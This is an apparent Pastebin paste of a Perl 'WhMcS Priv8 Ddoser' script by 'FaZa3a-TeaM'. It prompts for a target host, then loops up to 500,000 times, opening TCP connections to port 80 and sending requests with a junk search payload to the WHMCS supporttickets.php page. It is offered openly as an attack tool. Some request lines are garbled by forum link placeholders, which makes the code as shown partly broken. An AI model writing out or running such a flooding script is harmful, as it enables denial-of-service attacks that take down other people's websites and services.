Advertisement
FaZa3a-TeaM

WhMcS

Mar 28th, 2015
400
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.63 KB | None | 0 0
  1. #!/usr/bin/perl
  2. # Ddoser Coded by FaZa3a-TeM
  3. # https://www.facebook.com/Faza3a.gov
  4. #################################
  5. #
  6. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
  7. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
  8. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
  9. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
  10. # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
  11. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
  12. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
  13. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
  14. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
  15. #
  16. #####################################
  17.  
  18. use IO::Socket;
  19. print "################################################## ########\n";
  20. print "# #\n";
  21. print "# WhMcS Priv8 Ddoser #\n";
  22. print "# --------------------- #\n";
  23. print "# example: clients.site.com #\n";
  24. print "# C0deD By FaZa3a-TeaM #\n";
  25. print "# https://www.facebook.com/Faza3a.gov #\n";
  26. print "# #\n";
  27. print "################################################## ########\n";
  28. print "example = clients.site.com : ";
  29. $HOST = <STDIN>;
  30. chop ($HOST);
  31.  
  32. $i=0;
  33. while($i<500000){
  34. $i++;
  35.  
  36. $lower=1;
  37. $upper=200000;
  38. $random = int(rand( $upper-$lower+1 ) ) + $lower;
  39. $FILE = "searchterm=%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0% 0%0%0%0%0%0";
  40. $LENGTH = length $FILE;
  41.  
  42. $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "+";
  43. print $get1 "GET /supporttickets.php [Only registered and activated users can see links]";
  44. print $get1 "Host: ".$HOST. "\n";
  45. print $get1 "Content-Type: application/x-[Only registered and activated users can see links]";
  46. print $get1 "Content-Length: ".$LENGTH."\n\n";
  47. print $get1 $FILE;
  48. syswrite STDOUT, "+";
  49. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement